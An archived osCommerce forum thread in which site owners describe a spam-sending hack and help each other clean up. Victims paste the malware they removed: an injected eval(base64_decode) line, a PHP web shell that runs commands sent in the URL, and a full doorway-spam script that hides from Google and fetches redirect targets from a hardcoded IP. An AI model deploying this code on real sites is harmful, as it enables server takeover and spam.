
This topic is now archived and is closed to further replies.

talbot649

Spam Emails Being Sent


My Oscommerce store has also been hacked with email spam, as I noticed when a test customer name which I set up myself was sent spam.

 

Found that every .php file had a code on the first line which is not original.

How do they access all of my files?

Hackers should be sent to prison for life as this is a form of rape!

 

 

EXAMPLE OF CODE

<? /**/eval(base64_decode('aWYoZ


Probably thru /admin/file_manager.php

 

Read this


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Merry X MAS everyone,

 

Today I found the same problem in my osCommerce.

 

I deleted two files and one folder named yahoo in > images with file inedex.php inside ,

two other files are :

 

wuttt.php

<?php

error_reporting(0);

set_time_limit(60);

ini_set('safe_mode','Off');

$cmd = $_GET[x];

if(!empty($cmd)) {

function ex($cmd) {

if(@function_exists('exec')) {

$res = '';

@exec($cmd,$res);

$res = join("\n",$res);

echo $res."\n";

exit(0); }

if(@function_exists('shell_exec')) {

$res = '';

$res = shell_exec($cmd);

echo $res;

exit(0); }

if(function_exists('passthru')) {

$res = '';

@ob_start();

@passthru($cmd);

$res = @ob_get_contents();

@ob_end_clean();

echo $res;

exit(0); }

if(function_exists('system')) {

$res = '';

@ob_start();

@system($cmd);

$res = @ob_get_contents();

@ob_end_clean();

 

 

and second: up.php

content:

<!-- tyudfkuh85ujh -->

<?php

/*eval(base64_decode("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"));

*/

?>

 

Additionally I blocked two Russian YANDEX IPs: 95.108.128.241 and 77.88.31.247

For now online shop is working good without any mistake.

Best regards from Bulgaria!


 

You've been hacked. Deleting those two files almost certainly won't be enough to clean your site and certainly won't be enough to stop them coming back in. You need to use the Site Monitor addon to detect all suspect files and clean out any malicious code or delete rogue files, or else restore from a clean backup and then apply all the measures here

 

Blocking Yandex isn't going to help either.


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!


Thank you for information Ben,

I will clean whole host account but next week.

All the best!

By which time you might have a whole lot more to clean, a whole lot of spam emails might have been sent out to your customer base or others, which might just damage your site's reputation a bit, google and other search engines might list it as harbouring malware, etc but your choice....


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!


Thank you Ben, you are 100% right.

I found two other folders and deleted them. One was .files and the other .cache. In each folder I found 100 html files with link. I think the problems for now are captured. Tomorrow I will fight again with hacked files.

Thanks again!


Taking care and measures myself after an attack of spam emails to customers.

So this thread along with:

How to secure your site

Security Issues with admin Directory

Security hole found in OsCommerce

and...

How do I install a contribution or addons?

Has been very helpful.

 

However... Many of us are new here and new to OsC and PHP and Database. We do our best and thanks to many people around this forum we can get help. But many tend to forget that they too were once new and explain things kind of loosely. Newbies need help and to prevent more grey hairs than necessary, please please please, try to remember how it was for you at first and explain as "1-2-3" and easy as possible.

Don't get me wrong now. I'm so very very grateful to all of those who take the time and effort to help us "FNG's". So, a big and honest THANK YOU! to all of you.

 

Also... I'm getting a lot of visits from two particular IP numbers (or IP ranges).

These are... 77.88.27.27 - spider29.yandex.ru, Moscow, 48-, Organization Yandex enterprise network, RU, Russian Federation.

and... 67.195.115.242 - b3090874.crawl.yahoo.net, Sunnyvale, CA 94089, Organization YAHOO, US, United States.

Would any of these perhaps explain the strange folder "yahoo" that was mentioned earlier?

 

Thanks to all again... Thanks!


"I follow no path in life... Instead I walk straight and leave a trail for others to follow..."

www.bandofhand.se


Absolutely not. These appear to be valid indexing bots that are responsible for indexing your site into common search engines. They would not create folders on your site.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


Hi All,

As I mentioned before, I deleted a few files: fly, ssgfgfgf, block, up, mm, wutt, Iname, all with php ext., and two folders named (.yahoo) in the images folder, and added htaccess in the admin directory. That was 48h ago.

For now all is OK.

And don't forget to upload a robots.txt file with this inside:

 

#User-Agent: *

#Allow: /

 

User-agent: Yandex

Disallow: /

 

User-Agent: Googlebot

Allow: /.

Allow: /

 

All the best for All of You in NEW 2010!except hackers!

Michaella


To add ,

pls, Delete one file more: cart.php :

---------------------------------------

 

<!-- ingeenhhudsswkf -->

<?php

 

if(isset($_GET['red'])){

$ip=array("66.249.", "66.102.", "209.85.", "72.14.", "74.125.", "64.68.", "64.233.", "216.239.", "8.8.", "173.194.", "4.3.");

$myip=getenv("REMOTE_ADDR");

$myip2=explode(".", $myip);

for($i=0;;$i++){

if($ip[$i]==NULL) break;

$myip3=explode(".", $ip[$i]);

if($myip3[0]==$myip2[0]&&$myip3[1]==$myip2[1]){

exit;

}

 

}

include ('lname.php');

exit;

}

/////////Parser

function crawl_page($url){

$ch = curl_init ();

curl_setopt ($ch, CURLOPT_URL,$url);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_ENCODING , "gzip");

curl_setopt ($ch, CURLOPT_TIMEOUT, 200);

curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)");

$result = curl_exec ($ch);

curl_close($ch);

return $result;

}

 

////////Parsing Google

function gen_page($keyword){

$today = date("F j, Y");

$url="http://www.google.ru/search?client=firefox&num=100&hl=en&q=".urlencode($keyword)."&lr=lang_en";

$result=crawl_page($url);

preg_match_all("#<div class=\"s\">(.*)<br>#U", $result, $result_preg);

$s=array();

for ($i=0; $i<count($result_preg[1]); $i++){

$snippet=trim($result_preg[1][$i]);

$snippet=strip_tags($snippet,'<em>');

$snippet=str_replace('em>','b>',$snippet);

$snippet=str_replace("...",". ",$snippet);

$snippet=strip_tags($snippet);

array_push($s,$snippet);

}

shuffle($s);

////////Counter <iframe & td

$c='

 

<html>

<head>

<title>'.ucwords($keyword).'</title>

<meta http-equiv=Content-Type content="text/html; charset=utf-8"/>

<meta http-equiv="Content-Language" content="en"/>

</head>

<body bgcolor="#'.dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).'" text="#'.dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).dechex(rand(0,15)).'">

<h3>'.strtoupper($keyword).'</h3>

<small>'.$today.'</small>';

 

//links

$key = split(" ",$keyword); $skey = "";

for($e=0;$e<sizeof($key)-1;$e++){

$skey .= $key[$e];

$skey .= "%20";

}

if ($skey=="") $skey=$key[0];

else $skey=substr($skey,0,-3);

$result=crawl_page("http://clients1.google.ru/complete/search?hl=en&q=".$skey);

preg_match_all("|\[\"([^\"]+)\",|si",

$result, $out, PREG_PATTERN_ORDER);

$c.='

<div><UL>';

$c .= '<LI><a href="http://'.$_SERVER['SERVER_NAME'].'/.cash/map.html">Sitemap</a></LI>';

//$c .= "<LI><a href='?q=".str_replace(" ","-",$key[0])."'>".$key[0]."</a></LI>";

$cnt = 0;

foreach ($out[1] as $key)

{

$c .= "<LI><a href='?q=".str_replace(" ","-",$key)."'>".$key."</a></LI>";

if ($cnt++ > 2) break;

}

$c.='</UL></div><script src="?red='.$_GET["q"].'"></script><div><UL>';

for($i=0;$i<50;$i++){

$c.="

<LI>".$s[$i]."</LI>";

}

$c.='

</UL></div>

</body>

</html>';

return $c;

}

 

////////Generating Pages

function get_page($key)

{

$f_n="./.cash/".$key.".html";

if (@file_exists($f_n)) return @file_get_contents($f_n);

$keyword=str_replace("-"," ",$key);

$result=gen_page($keyword);

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

append_map($key);

return $result;

}

 

////////Generating Map

function gen_map()

{

$f_n="./.cash/map.html";

$head='<html>

<head>

<title>Sitemap</title>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />

<meta http-equiv="Content-Language" content="en-us" />

<meta name="robots" content="index, follow" />

</head>

<body>

<ul>

';

$shab=' <li><a href="http://'.$_SERVER['SERVER_NAME'].'/.cash/map.html">Sitemap</a></li>'."\r\n";

$bottom=' </ul>

</body>

</html>';

 

$result=$head.$shab.$bottom;

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

return true;

}

 

////////Adding Pages to Map

function append_map($key)

{

$f_n="./.cash/map.html";

if (!@file_exists($f_n)) gen_map();

$keyword=str_replace("-"," ",$key);

$shab=' <li><a href="http://'.$_SERVER['SERVER_NAME'].'/engine.php?q='.$key.'">'.$keyword.'</a></li>'."\r\n";

$bottom=' </ul>

</body>

</html>';

 

$result=file_get_contents("./.cash/map.html");

$result=str_replace($bottom, "", $result);

$result.=$shab.$bottom;

$f=@fopen($f_n,"w");@fwrite($f,$result);@fclose($f);

 

return true;

}

 

////////Parsing Redirect URL

$timelimit = 20*60;

error_reporting(0);

$lndfile="lname.php";

if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit){

$content = crawl_page("http://92.48.127.76/domain.php?password=d0cd05bf619266a045dfb4a016753a39");

$fp = fopen("lname.php","w+");

fwrite($fp,"window.location = \"http://");

fwrite($fp,$content);

fwrite($fp,"/hitin.php?land=42&affid=33222\";");

fclose($fp);

 

//$url=file_get_contents($f_n);

}

 

 

////////Main Code

 

if ($_GET["q"] != ""){

@mkdir("./.cash");

@chmod("./.cash", 0777);

$page = basename($_GET["q"]);

?><script language="javascript" type="text/javascript">

Cd=document;Cr="&"+Math.random();Cp="&s=1";

Cd.cookie="b=b";if(Cd.cookie)Cp+="&c=1";

Cp+="&t="+(new Date()).getTimezoneOffset();

if(self!=top)Cp+="&f=1";

if(navigator.javaEnabled())Cp+="&j=1";

if(typeof(screen)!='undefined')Cp+="&w="+screen.width+"&h="+

screen.height+"&d="+(screen.colorDepth?screen.colorDepth:screen.pixelDepth);

Cd.write("<img src='http://c.hit.ua/hit?i=23646&g=0&x=2"+Cp+Cr+

"&r="+escape(Cd.referrer)+"&u="+escape(window.location.href)+

"' border='0' wi"+"dth='1' he"+"ight='1'/>");

</script><?

print get_page($page);

exit;

}

?>

 

I would be happy if I helped someone.


Sorry michaella, but just giving out names of hacker files you have found isn't going to help as hackers can use any filenames they like. Just deleting them as you find them isn't going to help either - all malicious files and code have to be removed at the same time, and all security measures applied, otherwise they'll just get back in through a vulnerability that's still open or a file you haven't found yet.


www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!
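
The reply above makes the point that filenames are no use as indicators and that the whole tree has to be swept in one pass. A sketch of a content-based sweep, added here as an example (it is not the Site Monitor addon and not code from any poster): the patterns come from the files quoted in this thread, while the `images` no-PHP rule and the constructed sample tree are assumptions.

```python
import base64
import os
import re
import tempfile

# Patterns taken from the files quoted in this thread.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]*)", re.I)
CMD_FUNC = re.compile(rb"\b(?:exec|shell_exec|passthru|system)\s*\(", re.I)
REQ_INPUT = re.compile(rb"\$_(?:GET|POST|REQUEST|COOKIE)\b")
PHP_EXT = (".php", ".phtml")
NO_PHP_DIRS = {"images"}  # assumption: static/upload dirs that should hold no PHP


def decode_preview(b64, limit=40):
    """Decode a base64 argument for reading only; nothing is ever executed."""
    b64 = b64[: len(b64) - len(b64) % 4]  # tolerate a truncated payload
    try:
        return base64.b64decode(b64).decode("latin-1")[:limit]
    except ValueError:
        return ""


def scan(root):
    """Walk a web root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for d in dirnames:
            if d.startswith("."):  # e.g. the .yahoo, .cash, .files, .cache folders
                findings.append((os.path.normpath(os.path.join(rel_dir, d)),
                                 "hidden directory"))
        in_no_php = bool(NO_PHP_DIRS & set(rel_dir.split(os.sep)))
        for name in filenames:
            if not name.lower().endswith(PHP_EXT):
                continue
            rel = os.path.normpath(os.path.join(rel_dir, name))
            with open(os.path.join(dirpath, name), "rb") as fh:
                data = fh.read()
            for lineno, line in enumerate(data.splitlines(), 1):
                m = EVAL_B64.search(line)
                if m:
                    findings.append((rel, "eval(base64_decode) on line %d: %r"
                                     % (lineno, decode_preview(m.group(1)))))
                    break
            # Legitimate admin code can match this too, so treat it as a lead.
            if CMD_FUNC.search(data) and REQ_INPUT.search(data):
                findings.append((rel, "command function plus request input"))
            if in_no_php:
                findings.append((rel, "PHP file in no-PHP directory"))
    return sorted(findings)


def build_sample(root):
    """Write a small constructed tree that mimics what the posters describe."""
    payload = base64.b64encode(b'echo "constructed sample";').decode()
    files = {
        "index.php": "<?php echo 'clean'; ?>\n",
        "includes/header.php":
            "<? /**/eval(base64_decode('%s')); ?>\n<?php // original\n" % payload,
        "images/wuttt.php": "<?php $cmd = $_GET['x']; /* inert: exec($cmd) elided */\n",
        "images/.yahoo/index.php": "<?php // constructed doorway page\n",
        "images/logo.gif": "GIF89a",
    }
    for rel, text in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, reason in scan(tmp):
            print(path, "->", reason)
```

Run `scan()` against a downloaded copy of the web root rather than the live server; every finding is a lead for manual review, not a verdict.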


I just wanted to post a message here to thank everyone for posting the code snippets and contribs used to harden osComm.

My site was hacked just before xmas and I've spent quite a bit of time over the holidays implementing the fixes to prevent further attacks. Being a sw developer has definitely helped me to understand what's happening under the covers of osComm but I can see how someone without coding experience would be very put off by the holes. Let's hope the next version of osComm has stronger controls...

 

Thanks everyone!!

 

Steve Raffaele

Western Gecko


My site has also experienced this problem with the spam email. I've performed all of the recommended actions, but I noticed one thing that has not been mentioned here: There was an additional administrator account added to osCommerce.

 

The name of the administrator was "ass" and it had a blank password.


Check out Chad's News.


Did you perform all the necessary actions prior to the hack or after?


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


 

Thanks a lot mdtaylorlrim. A friend of mine confirmed the same info that very evening of my post but I'm grateful someone took the time and confirmed it again =).

Still working with the email problem though.


"I follow no path in life... Instead I walk straight and leave a trail for others to follow..."

www.bandofhand.se


OK

I am a very basic user of OSCommerce. After the initial week of install I made a style change, have added a couple of mods, was very very happy with OSC. Still am.

 

However

 

I had a lot of automated replies and then unsubscribe requests over Xmas.

Upon further investigation on this forum, etc I discovered my site had been thoroughly hacked with multiple file changes, inserted files, etc

 

I then reinstalled my site from local version.

 

I am now getting this message upon login.

 

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'mysql'@'localhost' (using password: NO) in /home/hosscom/public_html/catalog/admin/includes/functions/database.php on line 19

Unable to connect to database server!

 

What have I done and how can I fix it?

 

I intend to go through the secure your site items on restart.

 

regards

patrick


Either,

 

1. the hacker changed the login credentials on the mySQL server, or

2. your backup copy of the configuration.php file still has old info in there for the db login.

 

Either change the configuration.php file or fix the users file in the mySQL.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


thanks for quick response

 

"change the config file" is that catalog/admin/config?

and change it where? to what?

 

and how do you fix a users file in mySQL?

 

through cpanel?

 

regards

 

 


If the storefront will not connect it is the /catalog/includes/configuration.php and if the administration will not connect it is the catalog/admin/includes/configuration.php file.

 

 

To manage the users in your mySQL instance you will have to log into mySQL somehow, as likely provided by your host and most likely it is phpMyAdmin, and look to see what users you now have and either change or edit them as appropriate. I cannot tell you what to change it to, just make sure that your configuration.php and the mySQL both have the same user information.

 

And since it is possible that your mySQL users have been changed by the hacker I would delete all users and create a new mySQL user with the proper permissions to access the db, then put that info into your configuration.php file.

 

A very good site will have one user for the store front with permissions to read all tables, and write permissions to write to only those tables required to complete the sale. Then, a second user for the administration with read/write access to all tables, within reason.

 

 

On another note, I do not use hosting so am not intimately familiar with what hosts now provide in the way of mySQL users. They may only allow you one user and they decide what that user is. Maybe someone else that deals with hosting accounts can help you further.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


thank you mdtaylor

 

yes i cannot connect with either storefront or admin

 

apologies for being a dullard but I cannot see where or what in the config files I should change.

 

I can see mySQL user file in cpanel, Im thinking that this should be ok as the problem of connecting only occurred after I reinstalled from my local site

 

regards


Ok, in the /catalog/includes/configuration.php file down near the bottom you will see this:

 

 

define('DB_SERVER', 'what_is_here');

define('DB_SERVER_USERNAME', 'what_is_here');

define('DB_SERVER_PASSWORD', 'what_is_here');

define('DB_DATABASE', 'what_is_here');

define('USE_PCONNECT', 'false');

define('STORE_SESSIONS', 'mysql');

 

 

Everywhere you see "what_is_here" there should be a value specific to your server and mySQL instance.

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'what_is_here'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'what_is_here'); //this is the password associated with the user above

define('DB_DATABASE', 'what_is_here'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

Using phpMyAdmin click on 'privileges' and see what users are there. You should know what each one is and has access to. If you think you may have been compromised then change the root password and delete all other users. Then create a user for the store. "webguest" for example, and create a password for that user, "webpasw0rd" for example.

 

Then look at 'databases.' One of those should contain all your tables for the shop. Lets say it is 'mystore.'

 

So with this information I look at the /catalog/includes/configure.php file and set the values:

 

define('DB_SERVER', 'localhost'); //this usually works

define('DB_SERVER_USERNAME', 'webguest'); //this you can find in the phpMyAdmin users file

define('DB_SERVER_PASSWORD', 'webpasw0rd'); //this is the password associated with the user above

define('DB_DATABASE', 'mystore'); //this is the database name that all your tables are stored in

//the other lines should work as is

 

 

You did say you had access and can use phpMyAdmin, right? Or did I just waste a lot of time? :o


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?


many thanks!!!

 

no time wasted, unless you count a burning with hatred for hackers,,,

 

my site is back up for customers - hoss.com.au

 

however i cannot administer the site

im now getting:

 

The requested URL /admin/login.php was not found on this server.

 

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

 

 

I can see a login.php file is there in my catalog/admin folder so i dont know where to go

 

Im going on the road again in 3 hrs

so I think i am going to have to leave it as it is

ie

hopefully unhacked

still vulnerable

and unadministerable until i return ~ 2 weeks

 

and then go through it with a comb

 

 

thank you for your invaluable help

 

 

 

 

 


 

however i cannot administer the site

im now getting:

 

The requested URL /admin/login.php was not found on this server.

 

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

That's ok, we have not yet worked on your configure.php in your admin area.

 

 

I can see a login.php file is there in my catalog/admin folder so i dont know where to go

 

Im going on the road again in 3 hrs

so I think i am going to have to leave it as it is

ie

hopefully unhacked

 

If you are leaving town then do everyone a favor and backup your admin folder to your local drive and then delete it off the server. When you return we can fix it. This way the hacker will not be able to continue while you are away and not able to stop him.

 

Have a nice trip! :)


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?
